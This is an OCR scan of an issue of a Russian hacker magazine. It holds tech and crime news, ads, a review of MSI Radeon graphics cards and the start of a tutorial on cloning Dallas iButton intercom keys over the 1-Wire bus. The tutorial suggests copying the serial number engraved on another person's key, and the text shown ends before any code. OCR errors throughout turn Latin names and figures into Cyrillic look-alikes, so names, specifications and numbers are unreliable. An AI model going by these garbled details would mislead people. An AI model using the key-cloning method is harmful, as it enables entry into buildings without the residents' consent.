или«жилета». Ученые также отмечают, что кевлар, обычно уязвимый 
к прокалыванию и разрезанию, в новом «жидком бронежилете» 
становится «контейнером» для наночастиц, которые выполняют 
основную защитную функцию. 




> Вот так выглядит кевларовый пакет с наночастицами 
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МЕѲАЫЕѴѴЗ 



-> ПОСАДКА НА ХВОСТЕ 



Как обычно возвращаются из космоса, если летят туда не на шаттле? Обычно 
приземляются на парашюте. Никто еще не приземлялся на ярком столбе 
ревущего пламени, как это любят показывать в фильмах. Однако через четыре 
года такой трюк станет доступен частникам, купившим билету компании ВІие 
Огідіп. 

Недвано стало ясно, что аппарат, на котором ВІие Огідіп намерена катать 
туристов к номинальной границе атмосферы и космического пространства 
(100 километров), — это фактически развитие экспериментальной ракеты 
Эеііа СІіррег ЕхрегітепіаІ (он же ЭС-Х), созданной некогда в МсОоппеІІ Эоидіаз 
(компании, влившейся в 1 997 году в Воеіпд) по заказу американской Минобо- 
роны и Национального космического агентства. 

Особенностью ЭеІІа СІіррег, действующего прототипа многоразовых косми- 
ческих систем будущего, был вертикальный старт и вертикальное мягкое при- 
земление, с балансированием на струе, бьющей из включенных двигателей. 
Машина конической формы (основание — примерно 7 метров, высота — 15 
метров) будет подниматься в космос на жидкостных реактивных движках, 
питаемых концентрированной перекисью водорода и керосином. 

Общая массатоплива — 54 тонны, и это, очевидно, большая часть массы 
корабля. Тяга движков должна составить примерно 100 тонн, так что за 110 
секунд они должны поднять аппарат на высоту 40 километров, разогнав его до 
большой скорости. 

ВІие Огідіп утверждает, что первые 1 0 летных испытаний ее корабля могут 
состояться уже в этом году. Они будут продолжаться по минуте, и при этом 
ракета должна достичь высоты порядка 61 0 метров, а главное — мягко сесть 
обратно на реактивной струе. 




> Корабль ОС-Х 




АКЦИЯ 



Купи любую акустическую систему 5ѴЕЫ, пришли серийный 
номер ЗМЗ-сообщением вида "ЗѴЕІ\І_*********" на короткий 
номер 7015 и получи доступ к мобильным картинкам и 
рингтонам, созданным специально для тебя, а также шанс 
стать обладателем одного из 2500 подарков! Выигрывает 
каждое 3-е ЗМЗ-сообщение! 

• Акция действительна с 18 сентября по 31 октября 2006 года. 

• Стоимость зтз-сообщения 0,15 у.е. не учитывая налоги. 



ѵѵѵѵѵѵ.зѵеп.ги 

Товар сертифицирован 
На правах рекламы 
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-> ВЫИГРЫШ 
ПРОФЕССОРА 





Когда налайвжурнале на тебя катят бочку, ты что делаешь? 

Правильно, заходишь к обидчику и высказываешь ему в 1 0 
килобайтах все, что о нем думаешь, объяснив под конец, 
куда ему следует пойти. «Это не наш метод», — задумчиво 
молвил китайский профессор журналистики Чен Тангфа и 
подал на хостера Ыоасп.сопт в суд. Дело в том , что на этом 
популярном в Китае блог-сервисе неизвестный владелец 
одного из дневников довольно резко высказался в адрес 
Чена, раскритиковав методы его работы и используемые 
на лекциях материалы. Профессор подал иск не сразу: в 
начале он пытался достучаться до Ыодсп, чтобы те удалили 
неугодные записи, но там ему отказали. Мол, мы не обязаны 
удалять комментарии по первому требованию тех, кому что-то не нравит- 
ся. Удивительно, но судебный процесс мистер Тангфа выиграл, и компа- 
нию даже обязали выплатить штраф в размере... 126 долларов. Правда, 
определить владельца блога так и не удалось. По словам профессора, у 



него есть кое-какие подозрения, но судиться с этим студентом он пока не 
хочет. На ответ журнал истов, что старик чувствует после своей победы, 
тот прокомментировал: «Это показывает, что чувство собственного 
достоинства ставится выше свободы слова! » . 



* КИТАЙ ПРО ТИВ ПИРА ТОВ -» 25 ЛЕТ ЗА ДЕТСКОЕ ПОРНО 




Китай, как известно, наряду с Россией и Украиной считается 
оплотом пиратства. Правда, в отличие от наших чиновников, их 
правительство, похоже, всерьез решило искоренить это явление. 
На протяжении последних 1 00 дней в стране восходящего солнца 
прошли глобальные репрессии точек по продажам СЭ. Поли- 
ция обшмонала огромное количество магазинчиков, из которых 
около 1 0 тысяч оказались нечистыми на руку. 3 тысячи лавочек 
были закрыты, остальным предстоит выплатить штраф от $1250. 

О серьезных намерениях Китая покончить с пиратством говорит 
заместитель министра торговли КНР Цзян Цзэнвэя: «В ближайшие 
3 года мы собираемся организовать 50 центров по защите прав 
интеллектуальной собственности. Так что теперь мы будем строго 
следить за соблюдением авторских прав». Хотя центрами дело не 
ограничится. Правительство собирается даже ввести в китайских 
школах специальный предмет, где детям будут прививать уважение 
к интеллектуальной собственности. Больше всего этой новости 
рады, конечно, США, так как основную часть прибыли теряют их 
компании. Америка уже неоднократно требовала от Китая активных 
действий против пиратов. Что ж, теперь жаловаться ей не придется! 



За кражу в США можно получить 3 года тюрьмы. За убийство со 
смягчающими обстоятельствами — 1 5. Беларусам Егору Золотареву 
и Александру Бойко присудили 25. Нет, они не пытались взорвать бе- 
лый дом и не продавали секреты нации Ираку, они торговали детской 
порнушкой. Контора Егора и Санька называлась «Рэгпэй» и управ- 
ляла десятками сайтов категории сНііІсІ рогпо. Клиентов у ребят было 
достаточно — посмотреть на «игры» голых детишек подписались 
тысячи людей со всего мира, среди которых, как оказалось позже, 
были министры, врачи-педиаторы, школьные учителя. Порно-баро- 
нов арестовали в Европе еще год назад и затем вывезли в США, где 
они во всем признались. Друганы не только торговали порнухой, но и 
занимались незаконным отмыванием денег. Когда полиция обыскала 
офис фирмы, в сейфе нашли 1,15 миллиона долларов, из которых 
25 тысяч уйдет в американскую казну в виде штрафа. Как видишь, 
детское порно — это не игрушки, и последствия от этого могут быть 
серьезные. Некоторые клиенты «Рэгпэя» получили более 2 лет тюрь- 
мы только за покупку видео. Примечательно, что Беларусь не подала 
никаких запросов о выдаче Золотарева и Бойко для суда на родине. А 
ведь срок мог быть в разы короче. 
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-> ДВА В ОДНОМ: 
ЭЛЕКТРОНИКА И МАГНИТЫ 



В течение длительного времени ученые пытаются создать чипы, 
которые будут и обрабатывать, и хранить данные. Недавно ученые 
из Принстонского университета заявили о создании нового класса 
полупроводниковых устройств, в которые можно интегрировать 
наномагниты методом точного размещения атомов металла на 
материал, из которого формируется подложка чипа. 

О массовом производстве подобных чипов пока речи нет: ученые 
разместили несколько атомов с помощью зонда, сканирующего 
туннельного микроскопа, «вынув» предварительно атомы матери- 
ала подложки. 

«Вообще, сама возможность создавать поатомно компьютерные 
чипы — это своеобразный Святой Г рааль современной электрони- 
ки. Мы очень гордимся, что нам первыми удалось не только создать 
упорядоченный атомарно-электронный компонент, но и совместить 
в нем два типа электронных приборов: традиционный и спинтрон- 
ный». Сам чип создавался на подложке полупроводника арсенида 
галлия. Далее, с помощью СТМ был проведен обмен части атомов 
подложки на атомы магния. Магний усилил магнитные свойства 
полупроводника, создав локальные зоны «намагниченности». 
Полупроводниковый чип, созданный на основе модернизованной 
подложки, может выполнять две функции: работать с данными и хранить 
их одновременно. Сегодня же для этого в компьютерах используются 
несколько различных чипов, взаимодействующих друг с другом: ЦПУ 
производит логические операции, а РАМ или РОМ-память их сохраняет. 



Естественно, объединение этих двух устройств компьютеров в 
одно позволит уменьшить потребление энергии устройствами и 
увеличит скорость обработки информации. В перспективе данная 
технология может привести к появлению на рынке мультимедийных 
устройств с одним чипом, в котором будет «вся» вычислительная 
электроника и память. Перспективы, открывающиеся при пред- 
ставлении возможностей такой техники, огромны. Это и «однора- 
зовые» электронные книги, и различные мобильные мультимедий- 
ные игры, и просто «умная пыль». 





ИПолюс 

Компьютеры 



^ Высочайшая производительность. 
Теэшоііогия, на которую 
можно положить'сяМр 

Позвольте сотрудникам реализовать свой потенциал. 

Выберите компьютер “Передовик'’ на базе двухъ ядерного 
процессора Іпіеі® РепііитФО. 1 ^ 
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Два ядра. 



{ 812 ) 703 - 10-50 
( 812 ) 325 - 25-05 



сетевая интеграция, ноутбуки, 
рабочие станции и периферия 



Делай больше. 
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ТЕСТИРОВОЧНЫИ ЗАБЕГ ПЛАТ СЕМЕЙСТВА АТІ КАВЕОИ 



Редакция выражает благодарность за предоставленное на тестирование оборудование российскому представительству компании МЗІ. 

ОТ ОРІІ ГРАФИЧЕСКОГО УСКОРИТЕЛЯ ЗАВИСИТ ЦЕНА И ПРОИЗВОДИТЕЛЬНОСТЬ. НО КАКОЙ ЧИПСЕТ ЛУЧШЕ ВЫБРАТЬ? 
ЧТОБЫ ПОМОЧЬ ТЕБЕ ОПРЕДЕЛИТЬСЯ, МЫ РЕШИЛИ ПРОТЕСТИРОВАТЬ ПЛАТЫ НА БАЗЕ ЦЕЛОГО СЕМЕЙСТВА СОВРЕМЕН- 
НЫХ ОРЫ ОТ АТІ. УДОБНЕЕ ОЦЕНИТЬ РАЗЛИЧИЯ ЧИПСЕТОВ НА ПРИМЕРЕ КАРТ КАКОГО-ТО ОДНОГО ПРОИЗВОДИТЕЛЯ. 
НАИБОЛЕЕ ИНТЕРЕСНЫЙ НАБОР РАЗЛИЧНЫХ АДАПТЕРОВ НАМ СМОГЛА ПРЕДОСТАВИТЬ КОМПАНИЯ МЗІ. ТАК ЧТО ЕЕ 
АКСЕЛЕРАТОРЫ МЫ СЕЙЧАС И ПОКРИТИКУЕМ, А ЗАОДНО ПРИКИНЕМ, НА ЧТО СПОСОБНЫ СОВРЕМЕННЫЕ ВИДЕОКАРТЫ. 



□ Немного о высоком 

И артывтестепроходятподчетырьмя 
маркировками : РХ1300, РХ1600, 
РХ1800 и РХ1900. Так называе- 
мые НІ, МісІсІІе и І_оѵѵ секторы. Чтобы разно- 
образить сегмент продаваемых устройств, 
производители идут на многое: увеличивают 
объемы памяти, занижают частоты, урезают 
конвейеры. Оттого, как поколдовали над уст- 
ройством инженеры, зависит приставка пос- 
ле названия. Маркетинговая мысль зашла 
очень далеко — запутаться в обозначениях 
не составляет сложности. Ведущие карты в 
линейке, так называемые топовые устройс- 
тва, в большинстве случаев обозначаются 
аббревиатурами ХТ и ХТХ. Середнячки идут 
под стягами ОТ, Рго и ХІ_. Стандартные ва- 
рианты вовсе без маркеров, а урезанные 
их версии для малоимущих граждан выпус- 
каются под грифом ЗЕ. В принципе, все эти 
обозначения расставляются в том порядке, в 
котором хочет производитель, так что такая 
классификация не всегда верна, тем более 
что компании постоянно вводят новые мар- 
кировки. Итак, если ты решишь брать карту 

/016 



непосредственно под разгон, чтобы сэконо- 
мить несколько зеленых президентов и са- 
мому довести ее до ума, то советуем брать 
стандартные решения из выбранной тобой 
линейки. Они обычно стоят дешевле и лучше 
всего выдерживают оѵегсіоск. 

В случае, если тебе не интересен гемор с 
поднятием частот, то проще взять топовый 
вариант — поставил и забыл. Урезанные пла- 
ты хороши будут только в офисных компах. 
Они стоят гроши и толку от них мало. Если ты 
посвящаешь играм совсем крошечный отре- 
зок своего времени, причем только пасьянс 
раскладываешь и сапера гоняешь, то выше 
бюджетной линейки нос задирать не стоит. 
Больше тебе просто не понадобится. Если 
ты предпочитаешь иногда посмотреть, как 
же выглядит какая-либо модная игрушка или 
любишь вспомнить молодость за условным 
Зіагсгаіі или Оиаке III, то средний сегмент как 
раз для тебя. Ну, а тем прожигателям жизни, 
которые, роняя банку с колой, машут в возду- 
хе рукой, силясь нажать «Езс», а потом еще 
и загрузиться, наш совет — бери не ниже НІ- 
ЕІ\Ю. Проще поднакопить немного деньжат, 



чем потом ломать голову над наиболее ра- 
зумными настройками — так чтобы и красиво 
было, и играбельно. 

О Методика тестирования 

Нашей задачей было показать тебе потенциал 
различных графических чипсетов от АТІ. Для 
этого мы использовали синтетический бенч- 
марк ЗРМагк 2005, игры Раг Сгу, РоопгіЗ и НаІТ 
Ше 2, а также оценили разгонный потенциал 
графических процов. Для этого с помощью 
АТІіооІ мы поднимали частоты до тех пор, пока 
30 Магк 2005 не начинал артефачить. Игро- 
вые тесты производились при разрешениях 
1024x768 (с анизотропной фильтрацией хіб 
(ААхІ 6) и антиалайзингом х 4 (АРХ4), и без них). 



ТЕСТОВЫЙ СТЕНА 

АМР А1НІОП 3500+ 

ВДШЗ ОІасіаІіесИ Ідіоо 7200 Ыдііі 

|0Щ02х512 мь 

ЕщддіИШіІШШД Аіьаігоп квзи 

ЬШ«ЫЫВІйіііВЫЙІ Зеадаіе Ваггасиба 7200 грт 
80 Гб 

ІВШЦИІЕН8ІІШ 450 Вт 





М5І КХ1300 



Рго-То256Е 



Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



Техпроцесс: 



] ЯѴ515 

1 450 МГц 

] 250 (500) МГц 
1256 Мб 0042 
|128 бит 

И 

12 

В 90 нм 

Базовый вариант XI 300 серии отличается от 
XI ЗООРго только лишь сильно заниженными 
частотами. Дизайн платы, а также система 
охлаждения, каку старшей модели. Преиму- 
ществом М5І ВХ1300-ТЭ256Е является воз- 
можность установки в компактные корпуса. 
Например, в бейрбоны. Устройства более 
поздних поколений, начиная с ВХ1 800, обла- 
дают перегруженным РСВ и, как следствие, 
увеличены в размерах. 

Если карта МЗІ РХ1300Рго-ТО256Е может 
служить не только видимостью графическо- 
го устройства, но еще и выполнять некоторые 
другие функции, то в данном случае частот 
явно не хватает для полноценной работы. 
Поиграть с помощью этой платы проблема- 
тично, а видео можно смотреть и на более 
слабых моделях. В принципе, более весомых 
результатов по производительности можно 
добиться, если воспользоваться улучшенной 
системой охлаждения и подразогнать память 
и проц, но стоит ли игра свеч? 



Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



Техпроцесс: 



1 РѴ515 

1600 МГц 

1400(800) МГц 
І256М6ЭЭВ2 
! 128 бит 

14 

|2 

в 90 нм 

Типичный представитель бюджетной серии 
от МЗІ. Видеоакселератор показывает 
хорошие для своей цены результаты по 
производительности и имеет неплохой раз- 
гонный потенциал по памяти. Кулер пред- 
ставляет собой композицию из небольшо- 
го алюминиевого радиатора и крошечного 
вентилятора, который работает практичес- 
ки бесшумно. Охлаждающее устройство 
используется только для процессора — 
память довольно слабо греется, так что не 
нуждается в дополнительных радиаторах. 
Память изготовлена компанией Іпііпеоп в 
виде четырех чипов с временем отклика 
2.5 нс. 

Кроме невысокого уровня производитель- 
ности, МЗІ ВХ1300Рго-ТО256Е практически 
не обладает отрицательными чертами. Стоит 
упомянуть лишь слабую комплектацию. 



Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



1 ЯѴ530 

1500 МГц 

1 390 (780) МГ ц 
І256М6СЮЭВЗ 
1128 бит 

112 

|5 

іІёІіЖгМіД 90 НМ 

Этот представитель сектора МісІсІІе-епсІ — 
практически полная копия своего старшего 
брата, карты МЗІ ВХ1600ХТ-Т2Э256Е. На ох- 
лаждение производитель поскупился — ку- 
лер выглядит слабовато. Если бы не раструбы 
для вывода нагретого воздуха, ускоритель 
можно было бы перепутать с моделями млад- 
шей серии. Однако если ты не планируешь за- 
ниматься разгоном, то перегрев процессору 
не грозит. Карточка поддерживает все разум- 
ные прелести жизни: ГЮВ, ГЮТѴ. В комплек- 
те, помимо вечно нужных проводов, найдется 
игрушка в фирменной упаковке. 

Заниженные частоты сильно сказались на 
производительности. Тем не менее, практи- 
ка показывает, что дотянуть данную карту до 
уровня ХТ можно с легкостью, даже без воль- 
тажа. Хочешь сэкономить пару баксов? Тогда 
это твой вариант. 
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Прирост по частоте после разгона (%) 



■ %ѲРІІ □ % Мет 
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Г рафический процессор: 



Частота ГГІ: 



Частота памяти: 



Объем памяти: 



Ширина шины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



| Я520 

1 500 МГц 

[500(1000) МГц 
1 256 МбСЮЭЯЗ 
[256 бит 

Мб 

|8 

ПіІЯШйіД ЭОнм 

Карта является золотой серединой из всей 
линейки — производитель неурезал конвейе- 
ры, но тем не менее сильно понизил тактовые 
частоты на ОРГ) и памяти. Однако это не ме- 
шает устройству давать хороший результат 
как по производительности, так и по разгону. 
По сравнению с младшими моделями из МЗІ, 
ВХ1800ХЫІТ20256Е обладает удлиненным 
РОВ и требованиями к индивидуальному пи- 
танию. Комплектация стандартна — диски да 
шнурочки. Охлаждение не самое лучшее, но, 
по крайней мере, прикрывает наготу и про- 
цессора, и схем памяти. Под алюминиевой 
оболочкой кулера скрывается медный радиа- 
тор, подошва которого соприкасается с ОРИ 
Отвод тепла от памяти осуществляется через 
кожух. Вентилятор практически бесшумен, а 
схемы возле стабилизатора охлаждаются с 
помощью алюминиевого радиатора. 

МЗІ ВХ1800ХЫІТ20256Е является одним из 
представителей нижней границы Ні-ЕпсІ сег- 
мента. Возникает дилемма: купить лошадку 
посильнее и чуть-чуть дороже или найти воз- 
можности подобрать что-то менее мощное, но 
вместе с тем и дешевое. Погонять карту вряд 
ли получится — не приучена. 



Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



Техпроцесс: 



| Р580 

|575МГц 

|600(1200) МГц 
1 256 МбСЮЭЯЗ 
1 256 бит 

|36 

|8 

1 90 нм 

Эта карта вышла совсем недавно и является 
пока что самой младшей моделью в серии 
XI 900. Было урезано количество пиксельных 
конвейеров. Плюс ко всему сильно пониже- 
ны рабочие частоты. Поэтому сократилась 
вместе с производительностью и цена на уст- 
ройство. Если ужтебе такхочется быть макси- 
мально близко к прогрессу, а финансов на это 
не хватает, то советуем обратить внимание на 
МЗІ ЯХ19000Т-ѴТ2Э256Е. Выполнен девайс в 
однослотовом варианте, поскольку на карту 
установлена более скромная система охлаж- 
дения. С чипами памяти контактирует алю- 
миниевый корпус кулера, а с процом — алю- 
миниевая подкладка радиатора, для этого в 
кожухе сделана прорезь. Через теплообмен- 
ник проходит термотрубка, что позволяет ра- 
зумнее использовать площадь рассеивания, 
да и прогрев получается равномерным. 
Несмотря на кастрацию, плата все еще сто- 
ит не дешево, да и охлаждение схем памяти 
через алюминий не предвещает хорошего 
разгона. Вентилятор довольно громко режет 
воздух, что вызывает некоторый дискомфорт 
даже при работе с закрытым корпусом. 



М8І ЯХ1600 
ХТ-Т2Р256Е 



ЮОО 



Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинные конвейеры: 



[ ЯѴ530 

[590 МГц 

[690 (1380) МГц 
[256М6СЮЭЯЗ 
! 128 бит 

1 12 

[5 

[90 нм 

На видеоакселератор МЗІ ЯХ1600ХТ- 
Т2Э256Е установлена продвинутая система 
охлаждения. Полностью медная подкладка 
покрывает и процессор, и четыре микро- 
схемы памяти. Нагретый воздух проходит 
предварительно через радиаторы, после 
чего и выбрасывается через два перпенди- 
кулярных отверстия. Контакт с памятью от 
Затзипд (время отклика 1 .2 нс) производит- 
ся через термопрокладки. В общем, непло- 
хой вариант среднего ценового диапазона, в 
комплекте даже имеется игрушка. 

В радиаторах медь довольно тонкая, а рас- 
стояние между ребрами составляет порядка 
2 мм. Вентилятор в процессе работы назой- 
ливо шумит. Хотя в продаже можно найти 
модифицированную модель (МЗІ ЯХ1600ХТ- 
Т2Э256Е2) с пассивным охлаждением, на ко- 
торой, специально для любителей тишины, 
отсутствует пропеллер. 
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Г рафический процессор: 



Частота ГП: 



Частота памяти: 



Объем памяти: 



Ширинашины: 



Пиксельные конвейеры: 



Вершинж 



Техпроцесс: 



] Я580 

1 625 МГц 

]725 (1450) МГц 
1 51 2 Мб СЮОРЗ 
|256 бит 

1 48 

]8 

В 90 нм 

Как ты, наверное, уже знаешь, для работы 
в СгоззЛге-режиме требуется материнка с 
его поддержкой, ведущая плата и ведомая. 
Рассматриваемый вариант является веду- 
щей платой, и покупать его стоит только в 
том случае, если ты в серьез задумал орга- 
низовать дома настоящий дате-комплекс. 
Стандартный вариант Рабеоп Х1900ХТ сто- 
ит немного дешевле. Наша плата обладает 
специальным разъемом для подключения 
соединительного шнура к ведомой плате. 
Сам по себе М5І ВХ1900 СгоззРіге стандар- 
тен, обладает обыкновенным кулером, кото- 
рый характерен для всех карт XI 900 серии. 
Что поделаешь, ведь компания АН наложи- 
ла строгое вето на какие-либо изменения 
конструкции плат и охлаждения. Сама плата 
двухслотовая и требует дополнительного пи- 
тания, так что не забудь о хорошем РЗІІ. 

Что ни говори, а карты этой серии хороши. 
И процессор гонится славно, и память не 
подводит. Только стоит это достояние нема- 
лых денег. А для работы в дуальном режиме 
СгоззРіге потребуется раскошелиться аж на 
дваакселератора(М5І РХ1 ЭООСгоззРіге и МЗІ 
РХ1 900ХТ-ѴТ2051 2Е). Уж лучше такие бабки 
спустить на прекрасных дев и спиртное. Ну 
или на годовой пропуск в фитнес-центр для 
гламурных любителей спорта. 



ЮО 



Г рафический процессор 



Частота ГП: 



Частота памяти: 



Р580 

650 МГц 

775(1550) МГц 




ЗВ Магк 2006 



МЗІ РХ1900ХТХ-І 
ѴТ20512Е Г 



1000 2000 3000 



9347 
I 8736 
9000 10000 



О Выводы 

Все результаты просто супер! Даже самые 
слабые устройства позволяют погамать в 
некоторые современные игры. Так уж по- 
лучилось, что и разгонный потенциал кар- 
точек оказался на высоте. Осталось только 
скрепя сердце выдать ордена за заслуги 
перед Отечеством. Без лишних слов отдаем 
награду «Выбор редакции» МЗІ ЯХ1900ХТХ- 
ѴТ20512Е. Только вот цена может вызвать 
инфаркту членов твоей семьи. 

Появление большого количества новых карт 
сильно сказалось на цене ранее произведен- 
ных устройств. Поэтому, пока еще ходовая, 
но начавшая сбрасывать цену девайсина под 
названием МЗІ ВХ1600ХТ-Т20256Е, получает 
от нас приз «Лучшая покупка» заоптимальное 
соотношение цена/производительность. □С 



Как красиво все-таки корячатся виртуаль- 
ные уроды под шквальным огнем плазмога- 
на. Сметая все барьеры (в том числе и фи- 
нансовые), несутся геймеры по магазинам 
и скупают самые производительные видео- 
карточки. Пусть топовая модель XI 900 се- 
рии уже не лучшая из лучших (есть XI 900ХТ 
в режиме СгоззГіге и конкуренты от ІЧѴЮІА), 
но радовать своих пользователей она не 
перестает до сих пор. Шикарные частотные 
характеристики — это еще не предел. Чип, 
равно как и память, превосходно разгоня- 
ется. В комплекте имеется все, что необхо- 
димо: проводочки, шнурочки, макулатура и 
даже игрушка про мартышку Кинг Кога. Все 
это заставляет впасть в розовое самозабве- 
ние и не выходить из нирваны, по крайней 
мере, месяц. 

Плата стандартна — говорить об охлаждении 
и РСВ не стоит. Массивный, сильношумящий 
и надоедливый вентилятор вынуждает вру- 
бить аудиосистему погромче. Совсем дикие 
трели он выдает при разгоне, если выставить 
скорость на максимум. 



График 30М05: Карты прогонялись на этом 
бенчмарке два раза : до и после разгона. Мы 
не стали пользоваться версией 2006 не толь- 
ко в связи с ее некоторой необъективностью, 
но и по причине разномастности представ- 
ленных устройств. 



График НІ_2: Популярность продукта от Ѵаіѵе 
не оставляет сомнений — до сих пор он яв- 
ляется мерилом производительности графи- 
ческих девайсов. Г лавный процессор не дает 
развернуться топовым устройствам на всю 
катушку — именно поэтому так близки друг к 
другу результаты трех лидеров. В легких ре- 
жимах можно более-менее сносно погамать 
на любом из представленных адаптеров. 



График &оот 3: Многие фанаты ранних тво- 
рений Ю ЗоЙѵѵаге были разочарованы полу- 
ченным результатом — игрой ОоотЗ. Тем не 
менее, ее возможности позволяют наиболее 
верно оценить потенциал любой графичес- 
кой платы. Платы низшего уровня игру уже не 
держат, поэтому геймерам следует присмот- 
реться к более дорогому сегменту. 



Г рафик Гаг Сгу: В свое время игра заставляла 
восхищаться красочными полигонами тропи- 
ческого рая. Как платформа для тестирова- 
ния, онабылавыбрананеслучайно: разработ- 
чики не предъявляли непомерных требований 
к системе, но при желании графический про- 
цессор можно нагрузить на все сто. 



Оѵегсіоскіпд: Вот такой вот получился раз- 
гон. Конечно, частоты могли бы быть гораздо 
выше, возьми мы в руки паяльник, но не вся- 
кий геймер готов расстаться с гарантией. 
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ТЫ ПОТЕРЯЛ КЛЮЧИ ОТ ДОМОФОНА И НЕ МОЖЕШЬ СДЕЛАТЬ ДУБЛИКАТ? ИЛИ ХОЧЕШЬ ХОДИТЬ В ГОСТИ К ПОДРУГЕ, НО 
ЖЕЛЕЗНЫЙ ДОМОФОН ТЕБЯ НЕ ПРОПУСКАЕТ? КАКАЯ ДОСАДА! КАЗАЛОСЬ БЫ, В ТАКОЙ БЕЗВЫХОДНОЙ СИТУАЦИИ МОЖНО 
ЛИШЬ ПОЖАТЬ ПЛЕЧАМИ. АН НЕТ, «ХАКЕР» В ОЧЕРЕДНОЙ РАЗ РЕШАЕТ ПРОБЛЕМЫ 3/4тЕБЯ И ПРЕДЛАГАЕТ СМАСТЕРИТЬ УНИ- 
ВЕРСАЛЬНЫЙ ключ, спасоьный ПОКОРИТЬ ЛЮБОЙ ДОМОФОН. I 



1С|С 



О Как это работает? 

емные люди думают, что в таблет- 
ках от домофона находится обыч- 
ный магнит, который при контакте с 
замком открывает дверь. Это самое смешное 
и нелепое заблуждение, которое я когда-либо 
слышал. Ведь, на самом деле, таблетка пред- 
ставляет собой ПЗУ, с жестко зашитым клю- 
чом. Эта память называется ТоисИ Метогу 
марки Э31990А. Таблетка «общается» с до- 
мофоном по шине Опе-ѵѵіге (однопроводной 
интерфейс). Данная шина разработана фир- 
мой ЭаІІаз, она позволяет общаться двум и 
более устройствам всего по одному проводу. 
Если устройство пассивное (как в нашем слу- 



чае), то по шине передается также и питание 
по единственному проводнику. Кроме памяти, 
в ключе (таблетке) находится конденсатор 
на 60 пикофарад, который обеспечивает 
кратковременное питание на момент ответа. 
Ведущее устройство должно постоянно гене- 
рировать сигнал единицы для зарядки этого 
конденсатора, чтобы ПЗУ в таблетке продол- 
жало питаться. Отбросив все умные термины, 
можно сказать просто: все, что необходимо 
для работы устройства, передается только по 
одному проводу. К слову сказать, шина 1 -ѴѴіге 
оказалась столь удачной, что на ней органи- 
зованы промышленные сети, в том числе и в 
нашей стране. 

О Организация шины Опе-ѵѵіге 

Тебе наверняка стало интересно, как таб- 
летка взаимодействует с «базой», являясь 



пассивным устройством? Следует отметить, 
что парадом правит только мастер, то есть 
таблетка не способна генерировать какие- 
либо импульсы. Ее единственная возмож- 
ность — удерживать шину в нуле (замыкать 
шину на землю через внутренний транзис- 
тор). Упрощенная схема ключа и домофона 
показана на картинках. 

Если взглянуть на схему, нетрудно заметить, 
что по умолчанию у домофона установлено 
напряжение +5 вольт, логическая единица. 
Для передачи логического нуля мастер через 
транзистор замыкает шину на землю, а для 
передачи единицы — просто размыкает. Это 
сделано для того, чтобы обеспечить питание 
ведомого устройства. 

О Протокол взаимодействия 

Мастер в ожидании присоединения таблет- 



ХАКЕР 09 /93/ 06 







> Внутреннее устройство таблетки 
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> Схема дампа ключа 
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> Импульс сброса и импульс инициализации 




> Автором статьи была 
экстерном изучена 
8051 архитектура, так 
как большинство кодов 
было написано под нее. 
Он зверски замучил 
микроконтроллеры 
АТ89С51 , АТ89С2051 



ки, постоянно, с некоторой периодичностью, генериру- 
ет импульс ВЕЗЕТ (сброс). Принимая этот сигнал, ключ 
дожидается его окончания и дает импульс РРЕ5ЕІЧСЕ 
(присутствие) определенной длительности. Если сигнал 
РПЕЗЕКІСЕ оказывается слишком длинным, то домофон 
понимает, что это короткое замыкание, и тупо отмалчива- 
ется. В противном случае мастер-девайс выжидает неко- 
торое время и выдает команду на чтение ПЗУ, обычно это 
код семейства, в нашем случае — ЗЗН. Обрати внимание, 
как сделана передача нуля и единицы. В любом случае 
импульс «роняется» наземлю, но если передается едини- 
ца, то он быстро восстанавливается (это занимает около 
1 микросекунды). Если же должен быть ноль, то импульс 
некоторое время «висит» на земле, затем возвращается 
опять в единицу. Это нужно для того, чтобы пассивное ус- 
тройство постоянно пополняло энергию конденсатора, и 
на нем было питание. Далее домофон выдерживает неко- 
торое время и начинает генерировать импульсы приема 
информации, всего 64 импульса (то есть принимает 64 
бита инфы). Ключ лишь должен правильно сопоставить 
длительности. Если таблетка хочет передать ноль, то она 
удерживает шину некоторое время в нуле, если же нет, 
то просто молчит. Все остальное за нее выполняет до- 
мофон. 

О Содержимое ключа 081 990А 

Прежде чем мы перейдем к изготовлению эмулятора, 
нам придется рассмотреть содержимое памяти таблетки. 
Э31990Апредставляетсобой 8-байтовое ПЗУ с информа- 
цией, записанной лазером. 

В младшем байте содержится код семейства. Для 
Э31990А он всегда будет равен 01 Н. В шести последую- 
щих байтах содержится серийный номер ключа(тасамая 
информация, позволяющая открыть дверь). Последний 
байт называется СЯС — это контроль четности, обеспе- 
чивающий подлинность переданных данных. Он вычис- 
ляется из семи предыдущих байт по весьма сложному 
алгоритму. 

0 Физическое устройства ключа 

Наверное, все вышесказанное отбило всякое желание 
заниматься эмулятором ключа. Ведь считывать инфор- 
мацию с ключа тебе может показаться весьма сложным 
делом. Оказывается, нет! Производители ОаІІаз позабо- 
тились о нас, фрикерах, и всю необходимую для нас ин- 
формацию разместили непосредственно на ключе, при- 
чем в шестнадцатеричной форме! Она выгравирована на 
корпусе таблетки, и ее вполне можно прочитать, а потом в 
дальнейшем зашить в наш замечательный эмулятор. 

Из всей груды этой информации нас интересует следу- 
ющее: 

1 . СО (СПС) — это байт контроля четности, 7-й байт в прошивке. 



2. 838383833888 — двенадцать ниблов (полбайта) серийного номе- 
ра, то есть самого ключа в НЕХ-кодах. 

3. РР (код семейства) — в нашем случае равен 01 Н, нулевой байт 
нашего ключа. 

Получается, что мы можем просто написать программу, 
забить в нее ключ, скопировав дамп вручную, и в итоге 
получим готовый эмулятор. Достаточно просто взять у не- 
друга (товарища, боевой подруги — нужное подчеркнуть) 
ключик и переписать то, что на нем выгравировано. Что, я, 
в общем-то, с успехом и сделал :). 

О Ваяем эмулятор 

Вот и дошли мы до самого вкусного — до эмулятора. Сна- 
чала я нашел на каком-то сайте готовый эмуль, зашил его 
в свой АТ89С51 , и он не заработал (что не удивительно). 
